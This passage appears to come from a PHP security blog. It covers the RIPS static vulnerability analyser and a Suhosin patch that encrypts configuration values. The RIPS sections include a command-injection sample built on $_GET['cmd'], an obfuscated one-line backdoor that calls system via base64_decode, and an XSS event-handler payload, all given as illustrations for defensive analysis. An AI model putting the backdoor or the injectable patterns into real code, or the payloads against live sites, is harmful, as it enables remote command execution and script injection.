Once the token list of a PHP script is obtained, several improvements are made so that the tokens can be analysed correctly. This includes replacing some special characters with function names (like `$a` to backticks($a), which represents a command execution 7) or adding curly braces to program flow constructs where no braces have been used (for example if or switch conditions with only one conditional line following 8). Also, all whitespace, inline HTML and comments are deleted from the token list to reduce the overhead and to identify connected tokens correctly.
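
The last of these clean-up steps, removing whitespace, comments and inline HTML, might look like the following sketch. The function name stripIgnorableTokens() is hypothetical; the backtick replacement and the insertion of missing braces are not covered here.

```php
<?php
/**
 * Remove tokens that carry no information for the analysis.
 */
function stripIgnorableTokens(array $tokens)
{
    $ignored = array(T_WHITESPACE, T_COMMENT, T_DOC_COMMENT, T_INLINE_HTML);
    $kept = array();
    foreach ($tokens as $token) {
        if (is_array($token) && in_array($token[0], $ignored, true)) {
            continue;                         // drop whitespace, comments, HTML
        }
        $kept[] = $token;                     // keep everything else unchanged
    }
    return $kept;
}

$tokens = stripIgnorableTokens(
    token_get_all("<?php /* note */ \$a = 1; // done\n")
);
```

After this step, connected tokens such as a variable and the following "=" are direct neighbours in the list, which simplifies the look-ahead needed in later stages.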

Then the source code can be analysed token by token 9. The goal of RIPS is to analyse the token list of each file only once to improve speed. It loops through the token list and identifies important tokens by name. Several actions are performed when one of the following tokens is identified.

  • T_INCLUDE: If a file inclusion is found, the tokens of the included file are added to the current token list, together with an additional token that identifies the end of the included tokens. A note about the success of the inclusion is also added to the output if information gathering is turned on. If the file name consists of variables and strings, the file name can be reconstructed dynamically. An internal file pointer keeps track of the current position in the included files. Each file inclusion is also checked for a file inclusion vulnerability.
  • T_FUNCTION: If a new function is declared, the name and the parameters are analysed and saved for further analysis.
  • T_RETURN: If a user-defined function returns a variable, this variable will get traced backwards and is checked for securing actions. If the returned variable is sanitized by a securing or neutralizing function like md5() or a securing action like a typecast, this function is added to the global securing function list so that user-defined sanitizing functions can be identified. If the return value is tainted by user input, the function is added to a list of functions that can taint other variables when assigned to them.
  • T_VARIABLE: If a variable declaration is identified, the current scope is checked and the variable declaration is added either to a list of local variables (if the token is found in a function declaration) or to a global variable list, together with the corresponding line of the source code.

    Some examples for variable declarations could be:

       $a => $a = $_GET['a'];
       $b => $b = '';
       $b => $b.=$a;
       $c['name'] => $c['name'] = $b;
       $d => while($d = fopen($c['name'], 'r'))

    These examples show that it is not sufficient to only parse "=" and ";" in the token list to identify every variable declaration correctly. RIPS uses this list to trace variables found in PVF calls backwards to their origin. Also, all dependencies are added to each variable declaration to make a trace through different program flows possible.

  • T_STRING: If a function call is detected, the tool checks whether the function name is in the defined PVF list and the call therefore has to be scanned further. A new parent is created and all parameters configured as valuable are traced backwards by looking up the variable names in the global or local variable list. Findings are added to the PVF tree as children. All variables in the previously found declarations are also looked up in the variable list and added to the corresponding parent. If securing actions are detected while analysing the line of a variable declaration, the child is marked red. If user input is found, the child is marked white and the PVF tree is added to the global output list. Optionally, parameters can be marked as tainted if they are tainted by functions that read SQL query results or file contents. This makes it possible to identify vulnerabilities with a persistent payload storage.

    If a traced variable of a PVF in a user-defined function declaration depends on a parameter of this function, the declaration is added as a child and marked yellow. Then this user-defined function is added to the PVF list with the corresponding parameter list. The list of securing functions is adopted from the securing functions defined for the PVF found in this user-defined function.

    At the end, all currently needed dependencies in the program flow are added.

    Example 5:

       <?php
        function myexec($a, $b, $c)
        {
            exec($b);
        }

        $aa = "test";
        $bb = $_GET['cmd'];
        myexec($aa, $bb, $cc);
       ?>

    When the PVF call on line 4 is detected, the parameter $b is traced backwards. It is detected that $b depends on a function parameter of the function declaration myexec. Now the function myexec() is added to the PVF list with the second parameter defined as valuable and the securing functions defined for exec().

    The user-defined function myexec() is now treated like any other PVF. If a call with user input is found, the call and the vulnerability are added to the output:

    Scan result for example 5:

       4 : exec($b);
           2 : function myexec($a, $b, $c)
       9 : myexec($aa, $bb, $cc);
           8 : $bb = $_GET['cmd'];

    Variable $aa has been declared too but will not get traced back because it has no relevance for the vulnerability.

    Additionally, variables that are traced and declared in a different code structure than the one the PVF call was found in are annotated with the dependency of the variable declaration. Dependencies that affect both remain global dependencies for this parent.

  • T_EXIT, T_THROW: Tokens that can lead to an exit of the program flow are also detected, and the last found control structure the exit depends on (e.g. an if or switch statement) is added to the current dependency list. If a program exit is found in a function declaration, this function is added to the list of interesting functions with a note about a possible exit. This gives the user an overview of which conditions have to be met in order to reach the desired PVF call in the program flow.
  • Curly braces {}: All program flow is detected by curly braces, and therefore the tokens have to be prepared in situations where no braces have been used by the programmer. Control structures like if and switch are added to a list of current dependencies. If a PVF is detected in the same block of braces, the dependencies will be added to the parent. A closing brace marks the end of the control structure, and the dependency is removed from the current dependencies list.
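
The brace-based dependency tracking from the last item can be sketched as a simple stack. This is a simplified illustration, not RIPS code: pvfDependencies() is a hypothetical name, only if, switch and while are handled, every T_STRING matching a PVF name is treated as a call, and the input is assumed to use braces for every control structure.

```php
<?php
/**
 * Collect, for every PVF name found in $code, the control structures whose
 * braces enclose it.
 */
function pvfDependencies($code, array $pvfNames)
{
    $stack = array();      // one entry per open brace: a dependency or null
    $pending = null;       // control structure seen, waiting for its "{"
    $findings = array();
    foreach (token_get_all($code) as $token) {
        if (is_array($token)) {
            list($id, $text, $line) = $token;
            if ($id === T_IF || $id === T_SWITCH || $id === T_WHILE) {
                $pending = strtolower($text) . ' on line ' . $line;
            } elseif ($id === T_CURLY_OPEN || $id === T_DOLLAR_OPEN_CURLY_BRACES) {
                $stack[] = null;   // "{$var}" in a string is closed by a plain "}"
            } elseif ($id === T_STRING && in_array($text, $pvfNames, true)) {
                $findings[] = array(
                    'call' => $text,
                    'line' => $line,
                    'depends_on' => array_values(array_filter($stack)),
                );
            }
        } elseif ($token === '{') {
            $stack[] = $pending;   // opening brace starts the dependency
            $pending = null;
        } elseif ($token === '}') {
            array_pop($stack);     // closing brace ends the dependency
        }
    }
    return $findings;
}

$sample = <<<'PHP'
<?php
if ($_GET['debug']) {
    while ($i < 3) {
        system($cmd);
    }
}
exec($other);
PHP;

$findings = pvfDependencies($sample, array('system', 'exec'));
```

In this sample the system() call depends on the if and the while statement, while the exec() call after the closing braces has no dependencies.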

Additionally, tokens that identify PHP specialities like extract(), list() or define() are evaluated to improve the correctness of the results. Also, a list of interesting functions is defined which identify DBMS or session usage; detected calls are added to the output with a comment as information gathering if the verbosity level is set accordingly.
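
The handling of example 5, where the user-defined function myexec() is added to the PVF list, could be modelled as in the following sketch. The helper promoteToPvf() is hypothetical, and the securing functions listed for exec() are an assumption modelled on the system() entry shown earlier.

```php
<?php
// Assumed PVF entry for exec(), in the same format as the system() entry.
$pvfList = array(
    'exec' => array(array(1), array('escapeshellarg', 'escapeshellcmd')),
);

/**
 * If the variable traced from a PVF call is a parameter of the surrounding
 * user-defined function, register that function as a PVF of its own.
 */
function promoteToPvf(array $pvfList, $userFunction, array $parameters, $pvf, $tracedVariable)
{
    $index = array_search($tracedVariable, $parameters, true);
    if ($index === false || !isset($pvfList[$pvf])) {
        return $pvfList;                      // nothing to promote
    }
    $pvfList[$userFunction] = array(
        array($index + 1),                    // 1-based significant parameter
        $pvfList[$pvf][1],                    // securing functions of the inner PVF
    );
    return $pvfList;
}

// exec($b) inside function myexec($a, $b, $c) depends on the second parameter.
$pvfList = promoteToPvf($pvfList, 'myexec', array('$a', '$b', '$c'), 'exec', '$b');
```

A later call such as myexec($aa, $bb, $cc) is then looked up in the list like any built-in PVF, and only $bb is traced.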

4. The web interface

RIPS can be completely controlled through a web interface. To start a scan, a user has to provide a file or directory name, choose the vulnerability type and click scan. RIPS will only scan files with file extensions that have been configured. Additionally, a verbosity level can be chosen to refine the results as follows:

  • The default verbosity level 1 scans only for PVF calls which are tainted with user input without any detected securing actions in the trace.
  • The second verbosity level also includes files and database content as potentially malicious user input. This level is important to identify vulnerabilities with a persistent payload storage, but it might increase the false positive rate.
  • The third verbosity level will also output secured PVF calls. This option is important to detect insufficient securing, which can be hard to detect by static source code analysis.
  • The fourth verbosity level also shows additional information RIPS collected during the scan. This includes exits, notes about the success of analysing included files and calls of functions that have been defined in the interesting functions array. On large PHP applications, this information gathering can lead to a very large and unclear scan result.
  • The last verbosity level 5 shows all PVF calls and their traces no matter if tainted by user input or not. This can be useful in scenarios where a list of static input to PVF calls is of interest. However, this verbosity level will lead to a lot of false positives.
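
Read as a filter on findings, the verbosity levels above could be expressed as in this sketch. The function isReported() and the three flags of a finding are hypothetical names; level 4 only adds informational output and therefore does not change which PVF calls are reported.

```php
<?php
/**
 * Decide whether a finding is shown at the given verbosity level.
 * $finding is assumed to carry three boolean flags:
 *   user_input   - tainted directly by user input
 *   stored_input - tainted by file or database content
 *   secured      - a securing action was detected in the trace
 */
function isReported(array $finding, $verbosity)
{
    if ($verbosity >= 5) {
        return true;                          // level 5: every PVF call
    }
    $tainted = $finding['user_input']
        || ($verbosity >= 2 && $finding['stored_input']);
    if (!$tainted) {
        return false;
    }
    // Secured calls are only shown from level 3 upwards.
    return !$finding['secured'] || $verbosity >= 3;
}
```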

All found PVF calls and their traces are shown to the user syntax highlighted and divided into blocks. The syntax highlighting of the PHP code can be changed on the fly by choosing from 7 different stylesheets. The color schemes were manually adapted from Pastie and integrated into RIPS' own syntax highlighter.

Also, a draggable window can be opened to see the original source code by clicking on the file icon. All lines used in the PVF call and its trace are highlighted red in the original code, and the code viewer automatically jumps to the PVF call to allow a quick and easy review of the trace.

Another window can be opened for every detected vulnerability to quickly create a PHP curl exploit with a few clicks by hitting the target icon. Depending on the detected user input, there are prepared code fragments which can be combined to create an exploit in a few seconds by entering the parameter values and a target URL. For multi-stage exploits, cookies are supported as well as SSL, HTTP AUTH and a connection timeout.

For further investigations of complicated vulnerabilities, a list of user-defined functions and a list of program entry points (user input) is given to the user which allows him to directly jump into the code by clicking on the name. Also all user-defined functions called in the scan result can be analysed by placing the mouse cursor over the function name. Then the code of the function declaration is shown in a mouseover layer. Jumping between findings in a user-defined function and the according call of this function is also possible.

5. Results

In order to test RIPS, the source code of an internship platform at the Ruhr-University Bochum was scanned. This platform is a virtual online banking web application written in PHP and was designed to teach several web application vulnerabilities during the internship.

At first RIPS was run with verbosity level 1 in order to find PVFs directly tainted with user input and no securing detected. RIPS scanned 17399 lines in 90 files for 139 functions in 2.096 seconds. The following intended vulnerabilities were found:

  • 1/2 reflective Cross-Site Scripting
  • 0/1 persistent Cross-Site Scripting
  • 2/2 SQL Injections
  • 0/1 Business Logic Flaws
  • 1/1 File Inclusion
  • 1/1 Remote Code Execution
  • 1/1 Remote Command Execution

Two false positives occurred. Surprisingly, a previously unknown HTTP Response Splitting vulnerability and another unintended Cross-Site Scripting vulnerability were also detected.

One false positive was a SQL injection which had been prevented by a regular expression that RIPS could not evaluate as correct sanitization. Another false positive occurred with a fwrite() call to a logging file. Because the file was a text file and the data was sanitized correctly when read by the application again, this does not lead to a security flaw. However, it is important for the source code reviewer to know into which files an attacker is able to write, because this can lead to other vulnerabilities (e.g. when the attacker can write into a PHP file).

A significant false negative is the missing reflective XSS vulnerability. This one could only be detected by reviewing the secured PVF calls when setting the verbosity level to 3. The missing argument ENT_QUOTES in the securing function htmlentities() led to a false detection of sufficient securing in a scenario where an event handler could be injected into an existing HTML element.
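
The effect of the missing ENT_QUOTES argument can be reproduced with a short sketch. The payload and the single-quoted attribute are assumptions chosen for illustration; ENT_COMPAT is passed explicitly because it was the default at the time, whereas PHP 8.1 and later default to ENT_QUOTES.

```php
<?php
// Hypothetical input that tries to break out of a single-quoted attribute.
$payload = "' onmouseover='alert(1)";

// Without ENT_QUOTES single quotes are left untouched.
$compat = htmlentities($payload, ENT_COMPAT, 'UTF-8');

// With ENT_QUOTES single quotes are converted to &#039;.
$quotes = htmlentities($payload, ENT_QUOTES, 'UTF-8');

echo "<input value='" . $compat . "'>\n";   // attribute can be terminated
echo "<input value='" . $quotes . "'>\n";   // payload stays inside the value
```

A static analyser that only checks for the presence of htmlentities() treats both calls as secured, which is why such findings only show up when secured PVF calls are reviewed.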

To detect the persistent XSS vulnerability, RIPS was set to verbosity level 2, which treats file and database content as tainting input for PVFs. The persistent XSS vulnerability was detected successfully. However, this verbosity level also led to 11 false positives. This is because RIPS has no information on whether an attacker can insert data into the database at all or what kind of table layout is used. Almost all false positives affected a harmless column id with type integer and auto_increment set.

As expected, the Business Logic Flaw could not be detected by taint analysis for PVFs because it abuses the application's logic without any PVF.

6. Limitations and future work

The evaluation of dynamic strings that are built at runtime is the main limitation of static source code analysis. In PHP, the name of an included file can be generated dynamically at runtime. Currently, RIPS is only capable of reconstructing dynamic file names composed of strings and variables holding strings or statics. However, if the file name is constructed by calling functions, the name cannot be reconstructed. Large PHP projects in particular rely on an interaction of several PHP scripts, and a security flaw might depend on several files to work and to get detected correctly. Future work will address this problem. One option could be to combine dynamic and static source code analysis to evaluate dynamic file names. Currently, the best workaround is to rewrite complex dynamic file names to static hardcoded file inclusions.

It should also be obvious that RIPS is only capable of finding security vulnerabilities that are bugs, not intentionally obfuscated backdoors, which can easily be hidden with dynamic function names:

$a=base64_decode('c3lzdGVt');$a($_GET['c']);
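
Why this line escapes a scan for PVF names can be checked with a short sketch: the encoded string decodes to a PVF name at runtime, but the only function name visible in the token list is base64_decode. The variable names below are illustrative.

```php
<?php
// The encoded string is only resolved at runtime.
$name = base64_decode('c3lzdGVt');

// Collect all function-like names (T_STRING tokens) from the backdoor line.
$tokens = token_get_all('<?php $a=base64_decode(\'c3lzdGVt\');$a($_GET[\'c\']);');
$names = array();
foreach ($tokens as $token) {
    if (is_array($token) && $token[0] === T_STRING) {
        $names[] = $token[1];
    }
}

echo $name, "\n";                 // the function that is actually called
echo implode(', ', $names), "\n"; // the names a token-based scan can see
```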

The same limitation applies to user-defined securing functions that rely on regular expressions or string replacements, which cannot be evaluated during static source code analysis. Therefore it is not possible to determine in every scenario whether the securing implemented by the developer is safe. This can lead to false positives or negatives. As a compromise, the user has the option to review secured PVF calls.

In the future it is planned to fully support object oriented programming. Vulnerable functions in classes are detected, but RIPS in its current state supports neither interaction with variables assigned to an object nor classes that implement or extend other classes.

Additionally, it is planned to consider automatic typecasts. Currently a typecast by adding an integer to a string is not recognized and may lead to false positives in certain circumstances.

7. Related work

Various techniques such as flow-sensitive, interprocedural, and context-sensitive data flow analysis are described and used by the authors of Pixy 10, the first open source static source code analyser for PHP, written in Java 11. It uses control flow graphs to scan every possible combination of data flow. While Pixy is great at finding vulnerabilities with a low rate of false positives, it only supports XSS and SQL injection vulnerabilities. These two are the most common vulnerabilities in PHP applications.

The goal of RIPS was to build a new kind of static source code analyser written in PHP using the built-in tokenizer functions. Unlike Pixy, RIPS runs without any requirements like a database management system, the Java environment or any programming language other than PHP itself. RIPS also aims to find many more common vulnerabilities, including XSS and SQL injection, but also all kinds of header injections, file vulnerabilities and code/command execution vulnerabilities.

A difference in the user interface is that RIPS is designed to make it easy to review and compare the findings with the original source code for a faster and easier confirmation and exploitation, and therefore to give a better understanding of how the vulnerabilities work instead of only pointing out that the application is vulnerable in a specific line. Often a vulnerability can be found very fast in the depth of the source code, and the hard part is to trace back under which conditions this code block is called. Since static source code analysis can fail for very complicated vulnerabilities, the goal of RIPS is to do its best at finding flaws automatically but also to provide as much information and as many options as possible to make further analysis easy and fast.

Compared to Pixy, RIPS is also capable of finding vulnerabilities with persistent payloads stored in files or databases by using different verbosity levels. A disadvantage compared to Pixy is that the lexical analysis of RIPS assumes some good coding practices in the analysed source code in order to analyse it correctly. For example, RIPS assumes that code structures are written line by line and that user-defined functions are declared before they are called. Future work will include making the lexical analysis more flexible. Also, a lot of research about aliases in PHP has been done by the authors of Pixy 12; aliases are not supported by RIPS because of their rareness.

Both tools suffer from the limitations of static source code analysis as described in the previous section.

An extended version of Pixy called Saner 13 has been created to address the problem of unknown user-defined securing actions and their effectiveness. It uses predefined test cases to check whether the filter is effective enough or not.

Additionally, there exist tools like OWASP SWAAT 14 which are designed to find security flaws in more than one language but which only detect vulnerable functions by looking for strings. This is sufficient for a first overview of potentially unsafe program blocks, but without consideration of the application context, real vulnerabilities cannot be confirmed. However, this method with an additional parameter trace can also be enforced with RIPS by setting the verbosity level to 5.

8. Summary

In the past, a lot of open source web application scanners have been released that aim to find vulnerabilities in a black box scenario by fuzzing. A source code review in a white box scenario can lead to much better results, but only a few open source PHP code analysers are available. RIPS is a new approach using the built-in PHP tokenizer functions. It is specialized for fast source code audits and can save a lot of time. Tests have shown that RIPS is capable of finding known and unknown security flaws in large PHP-based web applications within seconds. The web interface assists the reviewer with a lot of useful features like the integrated code viewer, a list of all user-defined functions and a connection between both. Found vulnerabilities can be easily tested by creating PHP curl exploits. However, due to the limitations of static source code analysis and some assumptions RIPS makes about the program code, false negatives or false positives can occur. A manual review of the outlined result has to be made, or the verbosity level has to be loosened to detect previously missed vulnerabilities that could not be identified correctly. Also, most of the widespread PHP applications today rely on object oriented programming, which is not fully supported by RIPS yet. Therefore RIPS should be seen as a tool that helps analyse PHP source code for security flaws, but not as an ultimate security flaw finder.

References

  1. Fabien Coelho, PHP-related vulnerabilities on the National Vulnerability Database
    http://www.coelho.net/php_cve.html
  2. The PHP Group, Predefined Variables
    http://www.php.net/manual/en/reserved.variables.php
  3. The PHP Group, system – Execute an external program and display the output
    http://www.php.net/system
  4. The PHP Group, escapeshellarg – Escape a string to be used as a shell argument
    http://www.php.net/escapeshellarg
  5. The PHP Group, token_get_all – Split given source into PHP tokens
    http://www.php.net/token-get-all
  6. The PHP Group, token_name – Get the symbolic name of a given PHP token
    http://www.php.net/token-name
  7. The PHP Group, Execution Operators
    http://php.net/manual/en/language.operators.execution.php
  8. The PHP Group, Control Structures
    http://php.net/manual/en/language.control-structures.php
  9. The PHP Group, List of Parser Tokens
    http://php.net/manual/en/tokens.php
  10. Nenad Jovanovic, Christopher Kruegel, Engin Kirda, Pixy: A Static Analysis Tool
    for Detecting Web Application Vulnerabilities (Short Paper)
    http://www.seclab.tuwien.ac.at/papers/pixy.pdf
  11. Nenad Jovanovic, Christopher Kruegel, Engin Kirda, Pixy: A Static Analysis Tool
    for Detecting Web Application Vulnerabilities (Technical Report)
    http://www.seclab.tuwien.ac.at/papers/pixy_techreport.pdf
  12. Nenad Jovanovic, Christopher Kruegel, Engin Kirda, Precise Alias Analysis for
    Static Detection of Web Application Vulnerabilities
    http://www.iseclab.org/papers/pixy2.pdf
  13. Davide Balzarotti, Marco Cova, Vika Felmetsger, Nenad Jovanovic, Engin Kirda,
    Christopher Kruegel, Giovanni Vigna, Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications
    http://www.iseclab.org/papers/oakland-saner.pdf
  14. OWASP, OWASP SWAAT Project
    http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project

[PDF Version]  [Download RIPS]

]]>
http://php-security.org/2010/05/24/mops-submission-09-rips-a-static-source-code-analyser-for-vulnerabilities-in-php-scripts/feed/ 0
MOPS Submission 08: Configuration Encryption Patch for Suhosin http://php-security.org/2010/05/22/mops-submission-08-configuration-encryption-patch-for-suhosin/ http://php-security.org/2010/05/22/mops-submission-08-configuration-encryption-patch-for-suhosin/#comments Sat, 22 May 2010 07:57:24 +0000 admin http://php-security.org/?p=331 Today it is time to present you the eighth external MOPS submission. It is an article by Juergen Pabel describing a new feature for the Suhosin Extension that allows encrypting configuration strings.

Configuration Encryption Patch for Suhosin

Juergen Pabel, 2010-04-18

Motivation

Passwords stored in configuration files pose a significant risk for application owners. Before delving into technical solutions it should be noted why it is important to employ an additional layer of protection to restrict access to such authentication credentials. The first aspect to consider is the threat impact in case of unauthorized access: for most scenarios these credentials facilitate “unrestricted” (with respect to application data and/or functionality) access to respective backend systems. The second factor in determining the respective risk is the likelihood of the threat: naturally, access to these configuration files should be limited to personnel assigned to operating the application and computer system. However, the headcount of such operational personnel varies widely. Smaller companies usually rely on one or two administrators while large corporations distribute these responsibilities among various teams: operating system administrators, application administrators, application operators and application support teams. It is also not uncommon for those teams to be comprised of company employees, service providers and even independent subcontractors. Limiting access to configuration files by setting restrictive file access permissions is surely a good start but will likely be an incomplete solution, as some level of access to configuration files is often technically required. Thus, another approach is required to maintain the confidentiality of those authentication credentials. Encrypting the authentication credentials is a reasonable approach, although it should be noted that this does not implement holistic protection: the application must access the decrypted authentication credentials in order to use them for authentication with backend systems. Hence, the decryption key must be accessible to the application in order to decrypt such encrypted configuration values. Any dedicated attacker will likely be able to obtain access to both the encrypted configuration values and the decryption key (which must be stored somewhere itself). However, it is still important to employ such a protection scheme: it prevents opportunistic and spontaneous attacks like shoulder surfing. Some secondary consequences are that it might be easier to fend off potential accusations of negligence, and in criminal prosecutions it might also be used to demonstrate deliberate and malicious intent. It is with these objectives in mind that the presented feature addition to the Suhosin extension should be assessed.

Concept

Unlike in most other programming languages, it is common for PHP software to integrate its configuration files into the application: configuration files are usually implemented as PHP files that are executed as part of the application and contain variable assignments for configuration values. For simplicity, these files are referred to as “configuration scripts”.

Two new PHP functions are added to the Suhosin PHP extension: secureconfig_encrypt() and secureconfig_decrypt(). These functions implement the cryptographic operations and require a single string parameter each while returning the encrypted or decrypted result as a string. The secureconfig_decrypt() function is intended to be used within configuration scripts like so:

    $db_password = secureconfig_decrypt("Bdm9YyeumSFwGRBnn7eDRq3i896SSfzLO6bcD2yAFXY=");

Accordingly, the function secureconfig_encrypt() can be used to encrypt a plaintext configuration value (such as an authentication credential). A simple encryptor tool could be implemented as follows:

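    <?php
            echo "Please enter password: ";
            $stdin = fopen("php://stdin", "r");
            // fgets() keeps the trailing line break; strip it so that it
            // does not become part of the encrypted value
            $pass = rtrim(fgets($stdin), "\r\n");
            fclose($stdin);
            echo "Encrypted value: " . secureconfig_encrypt($pass) . "\n";
    ?>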

The aspect not yet discussed is the cryptographic key. It must be defined in php.ini or in one of its included sub-configuration files, such as the Suhosin configuration file:

    suhosin.secureconfig.cryptkey = "secret"

The SHA-256 digest of the specified value is computed and used as the key for AES-256 processing. AES-256 is currently the only implemented cipher. Any other cryptographic algorithm could be added later on, although such an enhancement would require an additional configuration value specifying the algorithm to use (and the key length in bits that the cipher requires).
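
The key derivation just described can be mirrored in PHP for illustration. The following is only a sketch, assuming PHP 7.1 or later; the helper name derive_secureconfig_key() is hypothetical and not part of the patch. It hashes the configured string with SHA-256 and, like the C code in the patch, falls back to 32 bytes of 0x55 when no key is available.

```php
<?php
// Hypothetical helper mirroring the patch's key setup; not part of Suhosin.
function derive_secureconfig_key(?string $configured): string
{
    if ($configured === null) {
        // Same fallback as the patch: 32 bytes with alternating bits (0x55).
        return str_repeat("\x55", 32);
    }
    // Raw (binary) SHA-256 digest: exactly 32 bytes, the AES-256 key size.
    return hash('sha256', $configured, true);
}

$key = derive_secureconfig_key('secret');
echo strlen($key), " bytes\n";
```

Because the digest always has 32 bytes, the configured value may be of any length; its strength still depends entirely on how hard that value is to guess.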

Implementation

The Suhosin extension version 0.9.31 (the most recent release as of this writing) was used as the base for implementing the described feature. A new file (secureconfig.c) was added and the necessary build and runtime-initialization references were included in the relevant files (config.m4, config.w32 and suhosin.c). In addition to the new PHP functions, the source file secureconfig.c contains the runtime-initialization function suhosin_hook_secureconfig(), which registers both newly implemented functions with the PHP runtime engine. The implementations of suhosin_secureconfig_encrypt() and suhosin_secureconfig_decrypt() are surprisingly trivial: parameters are obtained from the PHP engine by calling zend_parse_parameters() and passed to suhosin_encrypt_string() and suhosin_decrypt_string() respectively for cryptographic processing, along with the cryptographic key obtained from the php.ini configuration.

The cryptographic processing implemented in suhosin_encrypt_string() and suhosin_decrypt_string() calls for a more in-depth analysis. The first aspect to note is the adapted block cipher mode: it employs AES-256 in cipher-block chaining (CBC) mode without an initialization vector (the first block is processed as in ECB mode). Although this practice is cryptographically worrisome because it renders the first encrypted block (16 bytes for AES) susceptible to some cryptographic attacks, it is extremely unlikely that this modification impacts the effective security of the presented feature*. Because the resulting ciphertext was originally intended to be stored in HTTP cookies, the existing Suhosin functions employ a modified base64 encoding alphabet: all HTTP-relevant characters are cautiously replaced with safer alternatives (“/”, “=” and “+” are mapped to “-”, “.” and “_” respectively). The newly implemented functions undo these transformations in order to employ the standard base64 encoding.
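
The alphabet translation can be illustrated in a few lines of PHP. This is a sketch only: the patch performs the mapping with a C switch statement, and the two function names below are hypothetical.

```php
<?php
// Hypothetical helpers; they only illustrate the character mapping.

// Cookie-safe alphabet -> standard base64 ("-" => "/", "." => "=", "_" => "+").
function cookie_to_standard_base64(string $s): string
{
    return strtr($s, '-._', '/=+');
}

// Standard base64 -> cookie-safe alphabet (the inverse mapping).
function standard_to_cookie_base64(string $s): string
{
    return strtr($s, '/=+', '-._');
}

$standard = base64_encode(random_bytes(20));
$cookie   = standard_to_cookie_base64($standard);
var_dump(cookie_to_standard_base64($cookie) === $standard);
```

Since none of the three replacement characters occurs in the standard base64 alphabet, the mapping is reversible without ambiguity.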

Although functionally irrelevant for this enhancement, it should be mentioned that any plaintext passed to suhosin_encrypt_string() is concatenated with the IP address of the client (the function evidently assumes that it is only called in the context of HTTP cookies). Besides the obvious ciphertext parameter, the decryption function suhosin_decrypt_string() accepts an additional boolean parameter that controls whether the contained IP address must match the client IP address in the current context (again, assuming an HTTP request) for the decrypted plaintext to be returned. This parameter is set to false in suhosin_secureconfig_decrypt().

* A different conclusion might possibly be drawn for the original intent of suhosin_encrypt_string() and suhosin_decrypt_string(): to encrypt HTTP cookie data.

Download the patch here. The patch will be integrated into the official Suhosin Extension in the next week.

diff -Naur suhosin-0.9.31.org/config.m4 suhosin-0.9.31/config.m4
--- suhosin-0.9.31.org/config.m4    2010-03-28 22:43:13.000000000 +0200
+++ suhosin-0.9.31/config.m4    2010-04-18 15:56:25.000000000 +0200
@@ -5,5 +5,5 @@
 [  --enable-suhosin        Enable suhosin support])
 
 if test "$PHP_SUHOSIN" != "no"; then
-  PHP_NEW_EXTENSION(suhosin, suhosin.c crypt.c crypt_blowfish.c sha256.c memory_limit.c treat_data.c ifilter.c post_handler.c ufilter.c rfc1867.c log.c header.c execute.c ex_imp.c session.c aes.c compat_snprintf.c, $ext_shared)
+  PHP_NEW_EXTENSION(suhosin, suhosin.c crypt.c crypt_blowfish.c sha256.c memory_limit.c treat_data.c ifilter.c post_handler.c ufilter.c rfc1867.c log.c header.c execute.c ex_imp.c session.c aes.c compat_snprintf.c secureconfig.c, $ext_shared)
 fi
diff -Naur suhosin-0.9.31.org/config.w32 suhosin-0.9.31/config.w32
--- suhosin-0.9.31.org/config.w32   2010-03-28 22:43:13.000000000 +0200
+++ suhosin-0.9.31/config.w32   2010-04-18 15:56:25.000000000 +0200
@@ -4,7 +4,7 @@
 ARG_ENABLE("suhosin", "whether to enable suhosin support", "yes");
 
 if (PHP_SUHOSIN == "yes") {
-   EXTENSION("suhosin", "suhosin.c crypt.c crypt_blowfish.c sha256.c memory_limit.c treat_data.c ifilter.c post_handler.c ufilter.c rfc1867.c log.c header.c execute.c ex_imp.c session.c aes.c");
+   EXTENSION("suhosin", "suhosin.c crypt.c crypt_blowfish.c sha256.c memory_limit.c treat_data.c ifilter.c post_handler.c ufilter.c rfc1867.c log.c header.c execute.c ex_imp.c session.c aes.c secureconfig.c");
    if (PHP_SUHOSIN_SHARED) {
        ADD_SOURCES(configure_module_dirname, "crypt_win32.c crypt_md5.c", "suhosin");
    }
diff -Naur suhosin-0.9.31.org/php_suhosin.h suhosin-0.9.31/php_suhosin.h
--- suhosin-0.9.31.org/php_suhosin.h    2010-03-28 22:43:13.000000000 +0200
+++ suhosin-0.9.31/php_suhosin.h    2010-04-18 15:56:25.000000000 +0200
@@ -214,6 +214,8 @@
    long        cookie_checkraddr;
    HashTable *cookie_plainlist;
    HashTable *cookie_cryptlist;
+
+   char*   secureconfig_cryptkey;
   
    zend_bool   coredump;
    zend_bool   apc_bug_workaround;
@@ -329,6 +331,7 @@
 void normalize_varname(char *varname);
 int suhosin_rfc1867_filter(unsigned int event, void *event_data, void **extra TSRMLS_DC);
 void suhosin_bailout(TSRMLS_D);
+void suhosin_hook_secureconfig();
 
 /* Add pseudo refcount macros for PHP version < 5.3 */
 #ifndef Z_REFCOUNT_PP
diff -Naur suhosin-0.9.31.org/secureconfig.c suhosin-0.9.31/secureconfig.c
--- suhosin-0.9.31.org/secureconfig.c   1970-01-01 01:00:00.000000000 +0100
+++ suhosin-0.9.31/secureconfig.c   2010-04-18 16:20:33.000000000 +0200
@@ -0,0 +1,133 @@
+/*
+  +----------------------------------------------------------------------+
+  | Suhosin Version 1                                                    |
+  +----------------------------------------------------------------------+
+  | Copyright (c) 2006-2007 The Hardened-PHP Project                     |
+  | Copyright (c) 2007-2010 SektionEins GmbH                             |
+  +----------------------------------------------------------------------+
+  | This source file is subject to version 3.01 of the PHP license,      |
+  | that is bundled with this package in the file LICENSE, and is        |
+  | available through the world-wide-web at the following url:           |
+  | http://www.php.net/license/3_01.txt                                  |
+  | If you did not receive a copy of the PHP license and are unable to   |
+  | obtain it through the world-wide-web, please send a note to          |
+  | license@php.net so we can mail you a copy immediately.               |
+  +----------------------------------------------------------------------+
+  | Author: Juergen Pabel <jpabel@akkaya.de>                             |
+  +----------------------------------------------------------------------+
+*/
+
+#include <stdio.h>
+#include "php.h"
+#include "php_suhosin.h"
+#include "sha256.h"
+
+static char cryptkey[32];
+
+/* {{{ proto string secureconfig_encrypt(string plaintext)
+   Encrypt a configuration value using the configured cryptographic key */
+static PHP_FUNCTION(suhosin_secureconfig_encrypt)
+{
+   char *plaintext, *ciphertext;
+   int plaintext_len, ciphertext_len;
+   int i;
+   if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &plaintext, &plaintext_len) == FAILURE) {
+       return;
+   }
+   ciphertext = suhosin_encrypt_string(plaintext, plaintext_len, "", 0, cryptkey TSRMLS_CC);
+   if(ciphertext == NULL) {
+       return;
+   }
